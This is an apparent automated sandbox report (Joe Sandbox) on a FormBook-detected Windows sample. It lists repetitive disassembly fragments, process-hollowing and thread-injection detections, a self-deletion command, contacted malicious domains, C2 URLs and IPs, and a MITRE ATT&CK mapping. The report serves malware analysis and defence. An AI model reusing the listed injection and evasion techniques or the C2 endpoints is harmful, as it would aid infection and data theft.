          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB7E41 mov eax, dword ptr fs:[00000030h]18_2_04CB7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6AE44 mov eax, dword ptr fs:[00000030h]18_2_04D6AE44
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6AE44 mov eax, dword ptr fs:[00000030h]18_2_04D6AE44
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB766D mov eax, dword ptr fs:[00000030h]18_2_04CB766D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCAE73 mov eax, dword ptr fs:[00000030h]18_2_04CCAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCAE73 mov eax, dword ptr fs:[00000030h]18_2_04CCAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCAE73 mov eax, dword ptr fs:[00000030h]18_2_04CCAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCAE73 mov eax, dword ptr fs:[00000030h]18_2_04CCAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCAE73 mov eax, dword ptr fs:[00000030h]18_2_04CCAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CAC600 mov eax, dword ptr fs:[00000030h]18_2_04CAC600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CAC600 mov eax, dword ptr fs:[00000030h]18_2_04CAC600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CAC600 mov eax, dword ptr fs:[00000030h]18_2_04CAC600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD8E00 mov eax, dword ptr fs:[00000030h]18_2_04CD8E00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDA61C mov eax, dword ptr fs:[00000030h]18_2_04CDA61C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDA61C mov eax, dword ptr fs:[00000030h]18_2_04CDA61C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61608 mov eax, dword ptr fs:[00000030h]18_2_04D61608
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D5FE3F mov eax, dword ptr fs:[00000030h]18_2_04D5FE3F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CAE620 mov eax, dword ptr fs:[00000030h]18_2_04CAE620
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE37F5 mov eax, dword ptr fs:[00000030h]18_2_04CE37F5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D27794 mov eax, dword ptr fs:[00000030h]18_2_04D27794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D27794 mov eax, dword ptr fs:[00000030h]18_2_04D27794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D27794 mov eax, dword ptr fs:[00000030h]18_2_04D27794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB8794 mov eax, dword ptr fs:[00000030h]18_2_04CB8794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CBEF40 mov eax, dword ptr fs:[00000030h]18_2_04CBEF40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CBFF60 mov eax, dword ptr fs:[00000030h]18_2_04CBFF60
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D78F6A mov eax, dword ptr fs:[00000030h]18_2_04D78F6A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3FF10 mov eax, dword ptr fs:[00000030h]18_2_04D3FF10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3FF10 mov eax, dword ptr fs:[00000030h]18_2_04D3FF10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDA70E mov eax, dword ptr fs:[00000030h]18_2_04CDA70E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDA70E mov eax, dword ptr fs:[00000030h]18_2_04CDA70E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D7070D mov eax, dword ptr fs:[00000030h]18_2_04D7070D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D7070D mov eax, dword ptr fs:[00000030h]18_2_04D7070D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCF716 mov eax, dword ptr fs:[00000030h]18_2_04CCF716
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA4F2E mov eax, dword ptr fs:[00000030h]18_2_04CA4F2E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA4F2E mov eax, dword ptr fs:[00000030h]18_2_04CA4F2E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDE730 mov eax, dword ptr fs:[00000030h]18_2_04CDE730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3B8D0 mov eax, dword ptr fs:[00000030h]18_2_04D3B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3B8D0 mov ecx, dword ptr fs:[00000030h]18_2_04D3B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3B8D0 mov eax, dword ptr fs:[00000030h]18_2_04D3B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3B8D0 mov eax, dword ptr fs:[00000030h]18_2_04D3B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3B8D0 mov eax, dword ptr fs:[00000030h]18_2_04D3B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3B8D0 mov eax, dword ptr fs:[00000030h]18_2_04D3B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA58EC mov eax, dword ptr fs:[00000030h]18_2_04CA58EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA40E1 mov eax, dword ptr fs:[00000030h]18_2_04CA40E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA40E1 mov eax, dword ptr fs:[00000030h]18_2_04CA40E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA40E1 mov eax, dword ptr fs:[00000030h]18_2_04CA40E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA9080 mov eax, dword ptr fs:[00000030h]18_2_04CA9080
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D23884 mov eax, dword ptr fs:[00000030h]18_2_04D23884
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D23884 mov eax, dword ptr fs:[00000030h]18_2_04D23884
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE90AF mov eax, dword ptr fs:[00000030h]18_2_04CE90AF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD20A0 mov eax, dword ptr fs:[00000030h]18_2_04CD20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD20A0 mov eax, dword ptr fs:[00000030h]18_2_04CD20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD20A0 mov eax, dword ptr fs:[00000030h]18_2_04CD20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD20A0 mov eax, dword ptr fs:[00000030h]18_2_04CD20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD20A0 mov eax, dword ptr fs:[00000030h]18_2_04CD20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD20A0 mov eax, dword ptr fs:[00000030h]18_2_04CD20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDF0BF mov ecx, dword ptr fs:[00000030h]18_2_04CDF0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDF0BF mov eax, dword ptr fs:[00000030h]18_2_04CDF0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDF0BF mov eax, dword ptr fs:[00000030h]18_2_04CDF0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CC0050 mov eax, dword ptr fs:[00000030h]18_2_04CC0050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CC0050 mov eax, dword ptr fs:[00000030h]18_2_04CC0050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D71074 mov eax, dword ptr fs:[00000030h]18_2_04D71074
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D62073 mov eax, dword ptr fs:[00000030h]18_2_04D62073
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D74015 mov eax, dword ptr fs:[00000030h]18_2_04D74015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D74015 mov eax, dword ptr fs:[00000030h]18_2_04D74015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D27016 mov eax, dword ptr fs:[00000030h]18_2_04D27016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D27016 mov eax, dword ptr fs:[00000030h]18_2_04D27016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D27016 mov eax, dword ptr fs:[00000030h]18_2_04D27016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD002D mov eax, dword ptr fs:[00000030h]18_2_04CD002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD002D mov eax, dword ptr fs:[00000030h]18_2_04CD002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD002D mov eax, dword ptr fs:[00000030h]18_2_04CD002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD002D mov eax, dword ptr fs:[00000030h]18_2_04CD002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD002D mov eax, dword ptr fs:[00000030h]18_2_04CD002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CBB02A mov eax, dword ptr fs:[00000030h]18_2_04CBB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CBB02A mov eax, dword ptr fs:[00000030h]18_2_04CBB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CBB02A mov eax, dword ptr fs:[00000030h]18_2_04CBB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CBB02A mov eax, dword ptr fs:[00000030h]18_2_04CBB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCA830 mov eax, dword ptr fs:[00000030h]18_2_04CCA830
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCA830 mov eax, dword ptr fs:[00000030h]18_2_04CCA830
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCA830 mov eax, dword ptr fs:[00000030h]18_2_04CCA830
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCA830 mov eax, dword ptr fs:[00000030h]18_2_04CCA830
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CAB1E1 mov eax, dword ptr fs:[00000030h]18_2_04CAB1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CAB1E1 mov eax, dword ptr fs:[00000030h]18_2_04CAB1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CAB1E1 mov eax, dword ptr fs:[00000030h]18_2_04CAB1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D341E8 mov eax, dword ptr fs:[00000030h]18_2_04D341E8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDA185 mov eax, dword ptr fs:[00000030h]18_2_04CDA185
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCC182 mov eax, dword ptr fs:[00000030h]18_2_04CCC182
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD2990 mov eax, dword ptr fs:[00000030h]18_2_04CD2990
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D251BE mov eax, dword ptr fs:[00000030h]18_2_04D251BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D251BE mov eax, dword ptr fs:[00000030h]18_2_04D251BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D251BE mov eax, dword ptr fs:[00000030h]18_2_04D251BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D251BE mov eax, dword ptr fs:[00000030h]18_2_04D251BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD61A0 mov eax, dword ptr fs:[00000030h]18_2_04CD61A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD61A0 mov eax, dword ptr fs:[00000030h]18_2_04CD61A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D649A4 mov eax, dword ptr fs:[00000030h]18_2_04D649A4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D649A4 mov eax, dword ptr fs:[00000030h]18_2_04D649A4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D649A4 mov eax, dword ptr fs:[00000030h]18_2_04D649A4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D649A4 mov eax, dword ptr fs:[00000030h]18_2_04D649A4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D269A6 mov eax, dword ptr fs:[00000030h]18_2_04D269A6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCB944 mov eax, dword ptr fs:[00000030h]18_2_04CCB944
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCB944 mov eax, dword ptr fs:[00000030h]18_2_04CCB944
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CAC962 mov eax, dword ptr fs:[00000030h]18_2_04CAC962
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CAB171 mov eax, dword ptr fs:[00000030h]18_2_04CAB171
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CAB171 mov eax, dword ptr fs:[00000030h]18_2_04CAB171
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA9100 mov eax, dword ptr fs:[00000030h]18_2_04CA9100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA9100 mov eax, dword ptr fs:[00000030h]18_2_04CA9100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA9100 mov eax, dword ptr fs:[00000030h]18_2_04CA9100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CC4120 mov eax, dword ptr fs:[00000030h]18_2_04CC4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CC4120 mov eax, dword ptr fs:[00000030h]18_2_04CC4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CC4120 mov eax, dword ptr fs:[00000030h]18_2_04CC4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CC4120 mov eax, dword ptr fs:[00000030h]18_2_04CC4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CC4120 mov ecx, dword ptr fs:[00000030h]18_2_04CC4120
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe; Process queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exe; Process queried: DebugPort
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe; Code function: 1_2_00409B50 LdrLoadDll,1_2_00409B50
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe; Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe; Domain query: www.xn----pl8a630b0whm6t.com
          Source: C:\Windows\explorer.exe; Domain query: www.epubgame.net
          Source: C:\Windows\explorer.exe; Network Connect: 23.106.123.249 80
          Source: C:\Windows\explorer.exe; Network Connect: 172.67.178.31 80
          Source: C:\Windows\explorer.exe; Domain query: www.anamentor.com
          Source: C:\Windows\explorer.exe; Domain query: www.fuslonnd.com
          Source: C:\Windows\explorer.exe; Domain query: www.annellata.xyz
          Source: C:\Windows\explorer.exe; Domain query: www.metricwombat.com
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe; Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: 9F0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe; Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exe; Section loaded: unknown target: unknown protection: read write
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe; Thread register set: target process: 3472
          Source: C:\Windows\SysWOW64\msdt.exe; Thread register set: target process: 3472
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe; Process created: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe
          Source: C:\Windows\SysWOW64\msdt.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe"
          Source: explorer.exe, 00000004.00000000.254553864.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.280099499.0000000005EA0000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.265196730.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.303201524.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.274165242.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.294467030.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.284970506.00000000089FF000.00000004.00000001.sdmp, msdt.exe, 00000012.00000002.519708075.0000000003530000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.254553864.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.274165242.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.294467030.0000000001640000.00000002.00020000.sdmp, msdt.exe, 00000012.00000002.519708075.0000000003530000.00000002.00020000.sdmp; Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.254553864.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.274165242.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.294467030.0000000001640000.00000002.00020000.sdmp, msdt.exe, 00000012.00000002.519708075.0000000003530000.00000002.00020000.sdmp; Binary or memory string: SProgram Managerl
          Source: explorer.exe, 00000004.00000000.294037457.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000004.00000000.273892369.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000004.00000000.254192826.0000000001128000.00000004.00000020.sdmp; Binary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000004.00000000.254553864.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.274165242.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.294467030.0000000001640000.00000002.00020000.sdmp, msdt.exe, 00000012.00000002.519708075.0000000003530000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000004.00000000.254553864.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.274165242.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.294467030.0000000001640000.00000002.00020000.sdmp, msdt.exe, 00000012.00000002.519708075.0000000003530000.00000002.00020000.sdmp; Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe; Queries volume information: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe VolumeInformation
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Command and Scripting Interpreter 2 | Path Interception | Process Injection 512 | Masquerading 1 | Input Capture 1 | Security Software Discovery 221 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 512 | NTDS | Application Window Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 4 | Cached Domain Credentials | System Information Discovery 112 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 13 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

          Behavior Graph

          [Behavior graph (ID: 528622, sample: S9yf6BkjhTQUbHE.exe, start date: 25/11/2021, architecture: WINDOWS, score: 100). Process chain: S9yf6BkjhTQUbHE.exe started S9yf6BkjhTQUbHE.exe, which injected into explorer.exe; explorer.exe started msdt.exe and autoconv.exe; msdt.exe started cmd.exe, which started conhost.exe. Dropped file: C:\Users\user\...\S9yf6BkjhTQUbHE.exe.log (ASCII).]


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          S9yf6BkjhTQUbHE.exe | 22% | ReversingLabs | Win32.Trojan.AgentTesla

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          1.0.S9yf6BkjhTQUbHE.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.0.S9yf6BkjhTQUbHE.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.0.S9yf6BkjhTQUbHE.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.2.S9yf6BkjhTQUbHE.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://www.xn----pl8a630b0whm6t.com/czh8/?7n=WfBFmY7eHt5QBShHhdd2jwwFQU0Qfs4ciJop7u3ZFFtbwI7iz04mk8i | 0% | Avira URL Cloud | safe
          http://www.anamentor.com/czh8/?7n=IRLjoLIXlWieDd548KoJS/rowvlX7n5q7mSRLwbc7H8jLvnjYG+pwFiMTHdBlEYfNNBf&t4b=Zn-L | 0% | Avira URL Cloud | safe
          www.peptidepowder.com/czh8/ | 0% | Avira URL Cloud | safe
          https://www.anamentor.com/czh8/?7n=IRLjoLIXlWieDd548KoJS/rowvlX7n5q7mSRLwbc7H8jLvnjYG | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.xn----pl8a630b0whm6t.com | 23.106.123.249 | true | true | | unknown
          td-ccm-168-233.wixdns.net | 34.117.168.233 | true | true | | unknown
          cryptoentering.com | 127.0.0.1 | true | true | | unknown
          parkingpage.namecheap.com | 198.54.117.218 | true | false | | high
          www.ichelbrousset.com | 209.17.116.163 | true | false | | unknown
          www.anamentor.com | 172.67.178.31 | true | true | | unknown
          www.fuslonnd.com | unknown | unknown | true | | unknown
          www.dock-weiler.com | unknown | unknown | true | | unknown
          www.peregorodki.store | unknown | unknown | true | | unknown
          www.annellata.xyz | unknown | unknown | true | | unknown
          www.metricwombat.com | unknown | unknown | true | | unknown
          www.fullerhomeloans.com | unknown | unknown | true | | unknown
          www.epubgame.net | unknown | unknown | true | | unknown
          www.exploitslozdz.xyz | unknown | unknown | true | | unknown
          www.cryptoentering.com | unknown | unknown | true | | unknown

                                        Contacted URLs

                                        Name | Malicious | Antivirus Detection | Reputation
                                        http://www.anamentor.com/czh8/?7n=IRLjoLIXlWieDd548KoJS/rowvlX7n5q7mSRLwbc7H8jLvnjYG+pwFiMTHdBlEYfNNBf&t4b=Zn-L | true | Avira URL Cloud: safe | unknown
                                        www.peptidepowder.com/czh8/ | true | Avira URL Cloud: safe | low

                                        URLs from Memory and Binaries

                                        Name | Source | Malicious | Antivirus Detection | Reputation
                                        http://www.xn----pl8a630b0whm6t.com/czh8/?7n=WfBFmY7eHt5QBShHhdd2jwwFQU0Qfs4ciJop7u3ZFFtbwI7iz04mk8i | msdt.exe, 00000012.00000002.519445044.000000000315F000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | S9yf6BkjhTQUbHE.exe, 00000000.00000002.254291450.000000000304A000.00000004.00000001.sdmp, S9yf6BkjhTQUbHE.exe, 00000000.00000002.254094379.0000000002F81000.00000004.00000001.sdmp | false | | high
                                        https://www.anamentor.com/czh8/?7n=IRLjoLIXlWieDd548KoJS/rowvlX7n5q7mSRLwbc7H8jLvnjYG | msdt.exe, 00000012.00000002.521258705.0000000005332000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown

                                          Contacted IPs


                                          Public

                                          IP | Domain | Country | ASN | ASN Name | Malicious
                                          23.106.123.249 | www.xn----pl8a630b0whm6t.com | Singapore | 59253 | LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | true
                                          172.67.178.31 | www.anamentor.com | United States | 13335 | CLOUDFLARENETUS | true

                                          General Information

                                          Joe Sandbox Version:34.0.0 Boulder Opal
                                          Analysis ID:528622
                                          Start date:25.11.2021
                                          Start time:15:11:30
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 11m 15s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Sample file name:S9yf6BkjhTQUbHE.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:29
